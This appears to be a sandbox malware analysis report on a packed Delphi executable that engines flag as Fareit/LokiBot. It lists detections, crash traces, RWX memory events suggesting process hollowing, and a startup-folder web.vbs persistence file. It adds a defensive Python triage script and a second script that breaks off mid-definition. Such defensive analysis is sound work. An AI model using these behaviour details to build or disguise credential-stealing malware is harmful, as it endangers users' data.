11.0
0-day

SHA256: 73e2e91f580ed409293022751426fadf79c60713b1bf1c24dd6006ba5d9bd170
File name: 757bc8ab5108fb1a24919f43e0bde7e2.exe (the name is the sample's MD5; McAfee's detection name below embeds its first 12 hex digits)
Analysis duration: 104s
File size: 960.5KB

Flagged by static analysis; flagged by dynamic analysis.
Detection tags (tokens taken from the engine detection names): 8GW@AGKBBBDI AI SCORE=100 AIDETECTVM ALI2000015 ANDROM AUTOG AXAQ CLASSIC CONFIDENCE DELF DELFINJECT DELPHILESS EMOY EMTN FAREIT HIGH CONFIDENCE HORYRB IYPEP KCLOUD KRYPTIK LOKI LOKIBOT MALWARE1 MALWARE@#1ASE7DXZPJG7O PWSX QVM05 S + TROJ SCORE SMAD1 STATIC AI SUSGEN SUSPICIOUS PE TSCOPE UNSAFE X2094 ZELPHIF ZNOJ
鹰眼引擎 (Eagle Eye engine): not detected; no result from this engine

Static verdict
Antivirus engines (definition dates are older than the dynamic run, which took place on 2021-04-28)

Engine      | Result                               | Definition date | Engine version
McAfee      | Fareit-FVZ!757BC8AB5108              | 2020-12-11      | 6.0.6.653
Alibaba     | Trojan:Win32/DelfInject.ali2000015   | 2019-05-27      | 0.3.0.5
CrowdStrike | win/malicious_confidence_90% (W)     | 2019-07-02      | 1.0
Baidu       | (no detection)                       | 2019-03-18      | 1.0.0.2
Avast       | Win32:PWSX-gen [Trj]                 | 2020-12-10      | 21.1.5827.0
Kingsoft    | Win32.Hack.Undef.(kcloud)            | 2020-12-11      | 2017.9.26.565
Static indicators
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events). CODE, DATA and BSS are the section names the Borland/Delphi linker emits, so this is the normal layout of a Delphi binary and agrees with the packer identification below rather than being an independent packer indicator.
section CODE
section DATA
section BSS
The executable uses a known packer (1 event)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (7 events). All seven records share one call stack and one exception code (0xc0000005, access violation); only the faulting address differs between runs, and it always ends in 0x148d and lies above the 32-bit user-mode range, i.e. a wild pointer rather than code in a mapped module. Frame names such as RtlFlsAlloc+0x421 are nearest-export approximations and should not be read literally; New_ntdll_LdrLoadDll@16 is the sandbox monitor's own hook on LdrLoadDll, and the ghfjghfjhj frame is the main module of a process started from the ghfjghfjhj.exe copy, reached from mscoree!_CorExeMain.
Time & API / Arguments / Status / Return / Repeated. Each record below lists the timestamp, the API, its arguments and then a status line such as "success 0 0" (status, return value, repeat count). Timestamps are Unix epoch seconds and fall into two clusters on 2021-04-28, around 07:47 UTC for pids 2900/2208 and around 10:28 UTC for the rest, so the trace appears to combine two runs.
1619605683.302125
__exception__
stacktrace:
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x750d4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x750d5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff5a148d
success 0 0
1619605694.146
__exception__
stacktrace:
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xfdb5148d
success 0 0
1619605701.240125
__exception__
stacktrace:
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x750e4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x750e5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff56148d
success 0 0
1619605710.380125
__exception__
stacktrace:
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 180
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff45148d
success 0 0
1619605727.411875
__exception__
stacktrace:
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x750e4b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x750e5d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff55148d
success 0 0
1619605736.895875
__exception__
stacktrace:
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xff3e148d
success 0 0
1619605742.536625
__exception__
stacktrace:
RtlFlsAlloc+0x421 EtwNotificationRegister-0x6ae ntdll+0x3ee84 @ 0x77d6ee84
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x77d6c389
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x752ad4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
ghfjghfjhj+0xa23f8 @ 0x4a23f8
_CorValidateImage+0x83f _CorExeMain-0x2cc mscoree+0x4b0f @ 0x75184b0f
_CorExeMain+0xf62 CreateConfigStream-0x209a mscoree+0x5d3d @ 0x75185d3d
0x57005c

registers.esp: 1633872
registers.edi: 0
registers.eax: 0
registers.ebp: 1633912
registers.edx: 582600
registers.ebx: 0
registers.esi: 1634116
registers.ecx: 176
exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0xfdd5148d
success 0 0
Behavioural verdict
Dynamic indicators
One or more potentially interesting buffers were extracted; these generally contain injected code, configuration data, etc.
Allocates read-write-execute memory (usually to unpack itself) (50 of 222 events shown)
Time & API Arguments Status Return Repeated
1619596027.329879
NtAllocateVirtualMemory
process_identifier: 2900
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1619596027.548879
NtProtectVirtualMemory
process_identifier: 2900
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619596027.564879
NtAllocateVirtualMemory
process_identifier: 2900
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00620000
success 0 0
1619605680.677
NtAllocateVirtualMemory
process_identifier: 2244
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619605680.802
NtProtectVirtualMemory
process_identifier: 2244
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619605680.802
NtAllocateVirtualMemory
process_identifier: 2244
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00880000
success 0 0
1619605682.333125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1619605682.396125
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x01ed0000
success 0 0
1619605682.396125
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f30000
success 0 0
1619605682.396125
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 630784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f90000
success 0 0
1619605682.396125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 602112
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x01f92000
success 0 0
1619605683.208125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.208125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77d4f000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x02042000
success 0 0
1619605683.224125
NtProtectVirtualMemory
process_identifier: 2760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605682.848375
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003f0000
success 0 0
1619605683.036375
NtProtectVirtualMemory
process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619605683.036375
NtAllocateVirtualMemory
process_identifier: 2856
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02070000
success 0 0
1619605691.8175
NtAllocateVirtualMemory
process_identifier: 3196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01e10000
success 0 0
1619605691.9895
NtProtectVirtualMemory
process_identifier: 3196
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00469000
success 0 0
1619605692.0045
NtAllocateVirtualMemory
process_identifier: 3196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02140000
success 0 0
1619605693.849
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1619605693.865
NtAllocateVirtualMemory
process_identifier: 3272
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x01f20000
success 0 0
1619605693.865
NtAllocateVirtualMemory
process_identifier: 3272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f60000
success 0 0
1619605693.865
NtAllocateVirtualMemory
process_identifier: 3272
region_size: 630784
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01fa0000
success 0 0
1619605693.88
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 602112
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x01fa2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76353000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76354000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x005f2000
success 0 0
1619605694.021
NtProtectVirtualMemory
process_identifier: 3272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76351000
success 0 0
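The listing above is long but shapeless. What an analyst wants from it is per-process structure: which RWX regions a process allocated for itself, which later NtProtectVirtualMemory calls land inside those regions (a payload image being staged, such as the 630,784-byte region at 0x01f90000 in pid 2760 whose bytes from offset 0x2000 onward are re-protected RWX in one call), whether the executable's own image base page at 0x00400000 was made writable and executable, and whether pages at system-DLL addresses (0x76351000, 0x77d4f000) were touched. The Python below is an added example written for this page, not code from the sandbox or from Cuckoo. Its input is a hand-built list constructed from a subset of the pid 2760 and pid 2244 records above, and the 0x70000000 floor for "system DLL address" is an assumption about the 32-bit Windows 7 layout the sandbox appears to use.

```python
from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
IMAGE_BASE = 0x00400000          # image base of the hollowed children in the report
SYSTEM_DLL_FLOOR = 0x70000000    # assumption: where ntdll/kernel32 pages sit on 32-bit Windows 7

# Constructed from the pid 2760 and pid 2244 records above:
# (timestamp, api, pid, base_address, size, protection, allocation_type)
SAMPLE_EVENTS = [
    (1619605682.333125, "NtProtectVirtualMemory", 2760, 0x00400000, 4096, 0x40, None),
    (1619605682.396125, "NtAllocateVirtualMemory", 2760, 0x01ed0000, 655360, 0x40, MEM_RESERVE),
    (1619605682.396125, "NtAllocateVirtualMemory", 2760, 0x01f30000, 4096, 0x40, MEM_COMMIT),
    (1619605682.396125, "NtAllocateVirtualMemory", 2760, 0x01f90000, 630784, 0x40, MEM_COMMIT | MEM_RESERVE),
    (1619605682.396125, "NtProtectVirtualMemory", 2760, 0x01f92000, 602112, 0x40, None),
    (1619605683.208125, "NtProtectVirtualMemory", 2760, 0x02042000, 4096, 0x40, None),
    (1619605683.208125, "NtProtectVirtualMemory", 2760, 0x76351000, 4096, 0x40, None),
    (1619605683.224125, "NtProtectVirtualMemory", 2760, 0x77d4f000, 4096, 0x40, None),
    (1619605680.677, "NtAllocateVirtualMemory", 2244, 0x003f0000, 4096, 0x40, MEM_COMMIT),
    (1619605680.802, "NtProtectVirtualMemory", 2244, 0x00469000, 36864, 0x40, None),
]


def new_record():
    return {"rwx_alloc_bytes": 0, "regions": [], "staged": [],
            "image_base_rwx": [], "system_dll_rwx": []}


def triage_rwx(events, image_base=IMAGE_BASE):
    """Per-pid summary of RWX memory activity.

    regions         RWX regions the process allocated for itself, as (lo, hi)
    staged          later RWX protect calls that land inside one of those regions:
                    (region_base, region_size, offset_into_region, bytes_reprotected)
    image_base_rwx  protect calls on the executable's own image base page
    system_dll_rwx  protect calls on pages at system-DLL addresses
    """
    per_pid = defaultdict(new_record)
    for _ts, api, pid, base, size, protection, _alloc in sorted(events, key=lambda e: e[0]):
        if protection != PAGE_EXECUTE_READWRITE:
            continue
        rec = per_pid[pid]
        if api == "NtAllocateVirtualMemory":
            rec["rwx_alloc_bytes"] += size
            rec["regions"].append((base, base + size))
        elif api == "NtProtectVirtualMemory":
            if base == image_base:
                rec["image_base_rwx"].append(base)
            if base >= SYSTEM_DLL_FLOOR:
                rec["system_dll_rwx"].append(base)
            for lo, hi in rec["regions"]:
                if lo <= base < hi:
                    rec["staged"].append((lo, hi - lo, base - lo, size))
    return dict(per_pid)


def describe(summary):
    """Human-readable lines, one block per pid, in the order a triage analyst would read them."""
    lines = []
    for pid, rec in sorted(summary.items()):
        lines.append(f"pid {pid}: {rec['rwx_alloc_bytes']} bytes allocated RWX")
        for lo, size, off, n in rec["staged"]:
            lines.append(f"  payload region 0x{lo:08x} ({size} bytes): 0x{n:x} bytes re-protected RWX at +0x{off:x}")
        for base in rec["image_base_rwx"]:
            lines.append(f"  image header page 0x{base:08x} made RWX (in-place image overwrite candidate)")
        for base in rec["system_dll_rwx"]:
            lines.append(f"  system DLL page 0x{base:08x} made RWX (hook or patch candidate)")
    return lines


if __name__ == "__main__":
    print("\n".join(describe(triage_rwx(SAMPLE_EVENTS))))
```

Run against the full 222-event table the same function gives one block per pid; the staged-region line is the one to read first, because its size is the size of the image the process is about to execute.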
Creates executable files on the filesystem (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\web.vbs
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (34 events)
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy 7.520488350560497, section .rsrc (size_of_data 0x00073600, virtual_address 0x00082000, virtual_size 0x00073450): a section with a high entropy has been found. 0x73600 is 472,576 bytes, about 48% of the 960.5KB file, so the resource section carries most of the file's content.
entropy 0.48097967691505994: overall entropy of this PE file is high. This second figure is not bits per byte; it is the share of section data that lies in high-entropy sections (here essentially the .rsrc bytes over all section bytes), which the Cuckoo packer_entropy signature these descriptions come from flags above 0.2.
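To make the two entropy figures and the section-name check concrete, here is a pure-Python PE section walker that reproduces the Cuckoo-style computation: per-section Shannon entropy, the 6.8 bits-per-byte section threshold, the ratio of high-entropy section bytes to all section bytes (the 0.48 number above) with its 0.2 threshold, and the Borland/Delphi section-name check. This is an added example written for this page, not the sandbox's code; the thresholds are those of the open-source Cuckoo signature whose description strings appear above. Because the sample itself is not available here, the input is a constructed minimal PE32 with CODE/DATA/BSS sections and a large pseudo-random .rsrc section, built in the same block.

```python
import math
import random
import struct

# Thresholds used by Cuckoo's packer_entropy signature, whose two description
# strings appear verbatim in the report above.
SECTION_ENTROPY_THRESHOLD = 6.8      # bits per byte; a section above this is "high entropy"
HIGH_ENTROPY_RATIO_THRESHOLD = 0.2   # share of section bytes sitting in high-entropy sections
BORLAND_SECTION_NAMES = {"CODE", "DATA", "BSS"}   # emitted by the Borland/Delphi linker


def shannon_entropy(data):
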